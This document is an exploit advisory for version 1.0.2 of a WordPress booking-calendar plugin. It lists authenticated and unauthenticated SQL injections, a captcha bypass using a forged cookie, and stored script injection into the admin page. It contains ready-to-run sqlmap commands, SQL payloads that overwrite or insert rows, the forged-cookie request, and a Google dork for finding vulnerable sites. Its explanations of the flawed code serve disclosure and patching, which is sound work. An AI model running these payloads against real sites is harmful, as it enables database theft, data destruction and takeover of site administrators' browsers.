# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2 [Multiple vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vendor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: Windows 7 Ultimate + Firefox + sqlmap 0.9

============================================
* Authenticated SQL injection
============================================

========================
Description
========================
On a site with the vulnerable plugin installed, an attacker holding an account with Editor privileges (any role that has the `edit_pages` capability, which is the only check the handler performs) can exploit the SQL injection below and possibly escalate their privileges with the data obtained.

========================
Vulnerability
========================
The vulnerable function is located in dex_bcf.php. `dex_item` is read straight from `$_GET`, frozen into the constant `CP_BCCF_CALENDAR_ID` without any casting or escaping, and concatenated unquoted into the `WHERE cal_id=` clause; no nonce check is visible in the excerpt.

function dex_bccf_load_season_prices() {
    global $wpdb;
    if ( ! current_user_can('edit_pages') ) {
        echo 'No enough privilegies to load this content.';
        exit;
    }
    if (!defined('CP_BCCF_CALENDAR_ID')) define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);
    //.....vulnerable line
    $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.CP_BCCF_CALENDAR_ID);
    $maxcosts = 0;
    ...
    if (count ($codes)) {
        ...
        //Print results [every field of every returned row is echoed back, which is what makes UNION-based extraction possible]
        foreach ($codes as $value) {
            echo '';
            $price = explode(';',$value->price);
            echo ''.$price[0].'';
            for ($k=1; $k<=$maxcosts; $k++) echo ''.@$price[$k].'';
            echo ''.substr($value->date_from,0,10).'';
            echo ''.substr($value->date_to,0,10).'';
            echo '[Delete]';
            echo '';
        }
        ...
    }
}

(The HTML markup inside the echoed strings appears to have been stripped when this advisory was extracted; the relevant point is that each row's fields are written back into the response. Note that `date_from`/`date_to` are truncated to 10 characters by substr(), so data retrieved through a UNION is cut off in those columns -- the `price` column is echoed in full.)

======================
Injection
======================
The following URL can be used to inject:
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
------------------------
Vulnerable GET parameter
------------------------
dex_item

========================
Injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from the MySQL server with sqlmap. The request must carry the session cookies of a logged-in Editor; without them the handler exits at the capability check. The stray spaces inside the quoted URL of the original command have been removed, as they would break the request:
---------------------------------------------------------------
python sqlmap.py --url="http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1" -p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs

====================================================
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================
function dex_bccf_calendar_delete($ret) {
    global $wpdb;
    $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where id=".esc_sql($_POST["id"]) );
    return $ret;
}

Why esc_sql() does not help here ("filter bypass"): esc_sql() only escapes quotes and backslashes so that a value can be placed inside a quoted string literal. `id` is concatenated into an unquoted numeric comparison, so any payload that contains no quote characters (e.g. `1 AND SLEEP(5)`) passes through unchanged. The correct fix is to cast the value (`(int) $_POST['id']`) or to use `$wpdb->prepare()` with a `%d` placeholder.

======================
Injection
======================
The following URL is affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
------------------------
Vulnerable POST parameter
------------------------
id

========================
Injection techniques:
========================
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from the MySQL server with sqlmap. Caution: the injected predicate is evaluated by a DELETE statement, so a payload such as `1 OR 1=1` wipes the whole table -- run this only against a test instance.
---------------------------------------------------------------
python sqlmap.py --url="http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete" --data="id=1" -p id --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T

====================================================
* Authenticated SQL injection
====================================================

===============
Vulnerable code
================
function dex_bccf_calendar_update($ret) {
    global $wpdb;
    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin", "varchar(10) DEFAULT '0' NOT NULL");
    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color", "varchar(10)");
    $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."' where id=".esc_sql($_POST["id"]) );
    return $ret;
}

The quoted string columns (`title`, `description`, `color`) are protected by esc_sql(), but `id` is again concatenated unquoted into the WHERE clause, so it is injectable with quote-free payloads exactly as in the delete handler above.

======================
Injection
======================
The following URL is affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
------------------------
Vulnerable POST parameter
------------------------
id

========================
Injection techniques:
========================
-> BLIND

=======================
POC
=======================
(Intent of the original PoC: overwrite every row with the value "i0akiN" and sleep 5 seconds.)
url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- - &title=i0akiN&description=i0akiN&color=i0akiN

Two corrections to the original PoC: the field was posted as `tile=`, which the handler ignores -- the key it reads is `$_POST["title"]`. And MySQL's SLEEP() returns 0 on normal completion, so `1=1 AND SLEEP(5)` evaluates to false and this exact payload updates no rows, while the delay is incurred roughly once per row the UPDATE scans rather than once. To actually overwrite all rows post `id=0 or 1=1 -- -`; use something like `id=1 AND SLEEP(5) -- -` separately as a time-based probe.

=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================
function dex_bccf_calendar_add($ret) {
    global $wpdb;
    $calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
    ...
    $wpdb->query("insert into ".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color) ".
        " values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
        .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
    ..
}

`$calid` comes from `$_GET["id"]` with only the calendar prefix stripped, and is inserted unquoted as `reservation_calendar_id`. Because the value sits inside the VALUES list, the attacker can supply the remaining five columns themselves, close the parenthesis and comment out the rest of the statement; using hexadecimal literals (0x617373 = 'ass') for the string columns avoids quote characters entirely, so esc_sql() never has anything to escape.

======================
Injection
======================
The following URL is affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]

========================
Injection techniques:
========================
-> Data insertion

=======================
POC
=======================
Insert a row into the wp_bccf_reservation_calendars_data table without supplying any of the other POST parameters: the injected value provides all remaining columns of the INSERT (seven in total, matching the column list). The payload must be URL-encoded when sent, and the stray space before `id=` in the original has been removed:
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -

====================================================
* Unauthenticated SQL injection
====================================================

=======================
Description
=======================
An attacker without any authentication can send crafted requests that reach the database and retrieve sensitive information, which can then be used to escalate privileges and more. The entry point is a front-end request (`/?action=...`), reachable by anyone.

======================
Vulnerability
======================
The vulnerable function is located in dex_bcf.php. The `$calendar` argument (the request's `dex_item` value, see the injection section below) is concatenated unquoted into the query:

function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) {
    ...
    //$calendar is not sanitized in sql query
    $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar);
    $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false');
    while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) {
        $daily_price = $default_price;
        $sprice = array();
        foreach ($codes as $value) {
            $sfrom = strtotime($value->date_from);
            $sto = strtotime($value->date_to);
            if ($startday >= $sfrom && $startday <= $sto) {
                $sprice = explode (';', $value->price);
                $daily_price = $sprice[0];
            }
        }
        $season_prices[] = $sprice;
        $price += $daily_price;
        $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24;
        $days++;
    }
    ...
}

======================
Injection
======================
The following URL is affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost
------------------------
Vulnerable POST variable
------------------------
dex_item=1

========================
Injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND

========================
POC
========================
Obtaining all available databases from the MySQL server with sqlmap. No cookie is needed. The original command had `--tecnique` (a misspelling sqlmap rejects) and spaces inside the quoted URL; both are corrected here:
python sqlmap.py --url="http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost" --data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs --technique U

===========================================================
============================================================
* Unauthenticated SQL injection 2
============================================================

========================
Description
========================
The following function is also vulnerable to SQL injection: the constant CP_BCCF_CALENDAR_ID is normally defined by the request handler from `$_POST['dex_item']` or `$_GET['dex_item']` (see dex_bccf_load_season_prices() above), and this function concatenates it unquoted into its query. Since dex_bccf_get_option() is called from many places in the plugin, every code path that reaches it after the constant has been defined from request input is an injection point.

========================
Vulnerability
========================
Vulnerable function:

function dex_bccf_get_option ($field, $default_value) {
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if (!defined("CP_BCCF_CALENDAR_ID")) return $default_value;
    if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
        $value = @$dex_option_buffered_item->$field;
    else {
        //....vulnerable line
        $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
        $value = @$myrows[0]->$field;
        $dex_option_buffered_item = $myrows[0];
        $dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value;
    return $value;
}

##########################################

======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================

==============
DESCRIPTION
==============
An attacker can manipulate request variables to bypass the captcha condition, for example to insert an unlimited number of rows into the table (this can be automated with a script).

=============
... HOW?
=============
The attacker picks any value for the `hdcaptcha_dex_bccf_post` parameter, computes the MD5 hash of its lowercased form, and stores that hex digest in the client-controlled `rand_code` cookie. The check (see the function code below) fails only when BOTH the server-side session comparison AND the cookie comparison fail; because the cookie branch compares the submitted value against a value the client itself supplies, it can always be satisfied, regardless of what the session holds.

==========
POC
==========
REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_item=1&hdcaptcha_dex_bccf_post=joaquin

(The original listed the parameter twice, `hdcaptcha_dex_bccf_post=1&...&hdcaptcha_dex_bccf_post=joaquin`; PHP keeps the last occurrence, so `joaquin` is the value that is checked. The GET value is also used in preference to the POST one -- POST is consulted only when the GET parameter is missing or empty.)
--------------
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1
-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <--- MD5 hash of "joaquin" as given by the author (MD5 is a hash, not encryption)

===========================
VULNERABLE FUNCTION CODE
==========================
function dex_bccf_check_posted_data(){
    ....
    if (!isset($_GET['hdcaptcha_dex_bccf_post']) ||$_GET['hdcaptcha_dex_bccf_post'] == '')
        $_GET['hdcaptcha_dex_bccf_post'] = @$_POST['hdcaptcha_dex_bccf_post'];
    if ( (dex_bccf_get_option('dexcv_enable_captcha', TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
         ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) != strtolower($_SESSION['rand_code'])) || ($_SESSION['rand_code'] == '') ) &&
         ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) != ($_COOKIE['rand_code'])) || ($_COOKIE['rand_code'] == '') ) ) {
        $_SESSION['rand_code'] = '';
        echo 'captchafailed';
        exit;
    }
    // if this isn't the real post (it was the captcha verification) then echo ok and exit
    if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['dex_bccf_post'] ) ) {
        echo 'ok';
        exit;
    }
    ...
}

The third AND-term is the flaw: the captcha is accepted whenever `md5(strtolower(value))` equals the `rand_code` cookie, and the cookie is set by the client. Note also that this check calls dex_bccf_get_option(), so if CP_BCCF_CALENDAR_ID has already been defined from the request's `dex_item` at this point, the unauthenticated SQL injection described in the previous section is reachable from this same entry point. (The function begins at the end of the previous section and is shown abbreviated.)

###########################################

=======================================
* Persistent JS/HTML code injection
=======================================

========================
Description:
========================
An unauthenticated attacker can inject malicious code that is later executed by the victim's browser (the victim could be an administrator). When the victim visits the modified page, the attacker could steal data and/or remotely control the victim's actions.

========================
Vulnerability
========================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data

POST-DATA
dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INJECTION %3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INJECTION %3Ctextarea%3E

The parameters email_confirmation_to_user and email_notification_to_admin are not filtered and are included in the plugin's admin page inside a textarea; the leading `</textarea>` (%3C%2Ftextarea%3E) closes that element so the injected markup is parsed as page content and runs in the administrator's browser when that page is viewed. Beyond script execution, the same request apparently lets an unauthenticated client overwrite these plugin settings (the e-mail templates).

====================
VULNERABLE FUNCTION
====================
dex_bccf_save_options(), located in dex_bccf.php, saves the unfiltered POST data.
#########################################